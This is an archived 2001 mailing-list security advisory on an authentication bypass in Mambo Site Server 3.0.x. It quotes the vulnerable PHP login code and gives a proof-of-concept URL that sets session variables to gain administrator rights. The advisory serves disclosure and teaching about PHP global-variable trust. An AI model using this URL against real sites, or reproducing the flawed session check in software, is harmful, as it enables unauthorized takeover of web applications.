Serious security hole in Mambo Site Server version 3.0.X

From: root (Reverse) (rootat_private)
Date: Wed Jul 25 2001 - 04:42:09 PDT

Next message: aleph1at_private: "RE: telnetd exploit code"

Previous message: 3APA3A: "Sambar Server password decryption"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Serious security hole in Mambo Site Server version 3.0.X
Jul, 24 2001
by: Ismael Peinado Palomo - postmasterat_private
www.reverseonline.com

Summary
Mambo Site Server is a dynamic portal engine and content management tool
based on PHP and MySQL.

Details
Vulnerable systems:
Mambo Site Server version 3.0.0 - 3.0.5

Immune systems:

Impact:
Any user can gain administrator privileges.

Exploits:

Under 'administrator/' dir. we found that index.php checks the user and
password:

if (isset($submit)){
  $query  = "SELECT id, password, name FROM users WHERE username='$myname'
AND (usertype='administrator' OR usertype='superadministrator')";
  $result = $database->openConnectionWithReturn($query);
  if (mysql_num_rows($result)!= 0){
   list($userid, $dbpass, $fullname) = mysql_fetch_array($result);

   .....

   if (strcmp($dbpass,$pass)) {
    //if the password entered does not match the database record ask user to
login again
    print "<SCRIPT>alert('Incorrect Username and Password, please try
again'); document.location.href='index.php';</SCRIPT>\n";
   }else {
    //if the password matches the database
    if ($remember!="on"){
     //if the user does not want the password remembered and the cookie is
set, delete the cookie
     if ($passwordcookie!=""){
      setcookie("passwordcookie");
      $passwordcookie="";
     }
    }
    //set up the admin session then take the user into the admin section of
the site
    session_register("myname");
    session_register("fullname");
    session_register("userid");
    print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
    print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";

   }
  }else {
   print "<SCRIPT>alert('Incorrect Username and Password, please try
again'); document.location.href='index.php';</SCRIPT>\n";
  }

as we can see if the password for administrator matches the one in the
database, some variables are registered in the session and we are redirected
to index2.php...so lets take a look at index2.php....

 if (!$PHPSESSID){
  print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
  exit(0);
  }
 else {
  session_start();
  if (!$myname) session_register("myname");
  if (!$fullname) session_register("fullname");
  if (!$uid) session_register("userid");
  }

Here we can see the only verification of a valid user is through the global
var. PHPSESSID, so if we declare that variable on the url, and set the
'myname','fullname' and 'userid' we can gain administrative control...so
we'll test:

http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&full
name=admin&userid=administrator

BINGO!! now we have full administrative privileges...that's a typical
example of PHP hacking...it's clear that security can't rely on global
variables since they may be modifyed through url parsing.

Ismael Peinado Palomo
Ingeniero Jefe I+D
postmasterat_private
www.reverseonline.com

Next message: aleph1at_private: "RE: telnetd exploit code"
Previous message: 3APA3A: "Sambar Server password decryption"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jul 25 2001 - 08:40:48 PDT